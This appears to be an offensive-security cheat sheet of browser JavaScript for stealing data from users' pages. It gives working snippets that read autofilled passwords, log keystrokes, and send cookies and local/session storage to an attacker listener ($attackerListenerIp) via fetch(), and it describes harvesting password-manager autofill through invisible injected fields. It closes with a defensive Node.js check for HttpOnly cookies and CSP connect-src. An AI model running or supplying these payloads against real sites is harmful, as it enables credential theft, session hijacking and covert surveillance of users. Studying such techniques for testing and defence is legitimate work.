Get hidden content from password fields
Scenario:
- You analyse a system where a username / password was automatically filled out.
- You want to extract the password.
Use JavaScript for extraction. Copy and paste the following into the web browser's console (the original iterated with `for ... in`, which also yields the collection's `length` and method names, and referenced an undefined `input`; fixed below):
let fields = document.getElementsByTagName("input");
for (let field of fields) {
console.log(field.value);
}
Extract keystrokes live from a Browser
Scenario:
- You have access to a JS console from some user.
- You want to log the keystrokes of a page.
Do:
- Open a listener on your own server, e.g.
python -m http.server 80
- Paste the following JS in the web browser's console (the key is URL-encoded so characters such as `#` or `&` do not break the request):
function logKey(event) {
fetch("http://$attackerListenerIp/k?key=" + encodeURIComponent(event.key));
}
document.addEventListener('keydown', logKey);
Extract Cookies
Scenario:
- You can inject JS (XSS / direct access) and want to get all cookies.
Inject/Do:
let cookie = document.cookie
let encodedCookie = encodeURIComponent(cookie)
fetch("http://$attackerListenerIp/d?data=" + encodedCookie)
Extract local / session storage
Like above, for both localStorage and sessionStorage (the original declared `data` and `encodedData` twice with `let`, which throws a redeclaration error when pasted into one console session; a loop over both stores avoids that):
for (const store of [localStorage, sessionStorage]) {
let encodedData = encodeURIComponent(JSON.stringify(store));
fetch("http://$attackerListenerIp/d?data=" + encodedData);
}
Stealing site passwords
Scenario:
- A password manager is used by a user where you can inject JS.
Then, inject JS which adds an invisible user/username/name text field and a field with type="password". Wait some seconds and then extract the value of these fields. If a password manager is in place, it may have filled in sensitive data automatically.
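The common thread of the snippets above is that document.cookie and fetch() are reachable from injected script. As an added example (not part of the original post), the following Node.js code checks whether a site's response headers close those two doors: HttpOnly keeps a cookie out of document.cookie, and a Content-Security-Policy whose connect-src omits the listener's origin makes every fetch() above fail. All header values and URLs are constructed samples.

```javascript
// Added example, not from the original post. Simplified CSP3 source matching
// for connect-src (which governs fetch()), plus an HttpOnly check on
// Set-Cookie. Header values and URLs used with it are constructed samples.

function parseCsp(cspHeader) {
  const directives = {};
  for (const part of cspHeader.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name.toLowerCase()] = sources.map((s) => s.toLowerCase());
  }
  return directives;
}

// Does one source expression permit a request to `target` from `page`?
// Handles 'none', 'self', '*', scheme-only and host sources ("*." and port allowed).
function sourceMatches(src, target, page) {
  if (src === "'none'") return false;
  if (src === "*") return true;
  if (src === "'self'") return target.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return target.protocol === src;
  const m = src.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:]+)(?::(\d+|\*))?/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme + ":" !== target.protocol) return false;
  const hostOk = wildcard ? target.hostname.endsWith("." + host) : target.hostname === host;
  if (!hostOk) return false;
  const targetPort = target.port || (target.protocol === "https:" ? "443" : "80");
  return !port || port === "*" || port === targetPort;
}

// True if a fetch() from `pageUrl` to `targetUrl` passes the policy.
// connect-src falls back to default-src; with neither present the request is allowed.
function fetchAllowed(cspHeader, pageUrl, targetUrl) {
  const csp = parseCsp(cspHeader);
  const sources = csp["connect-src"] ?? csp["default-src"];
  if (sources === undefined) return true;
  const target = new URL(targetUrl);
  const page = new URL(pageUrl);
  return sources.some((src) => sourceMatches(src, target, page));
}

// True if document.cookie would expose this cookie (no HttpOnly attribute).
// localStorage/sessionStorage have no such flag: whatever is stored there stays readable.
function cookieReadableByScript(setCookieHeader) {
  const attributes = setCookieHeader.split(";").slice(1);
  return !attributes.some((a) => a.trim().toLowerCase() === "httponly");
}
```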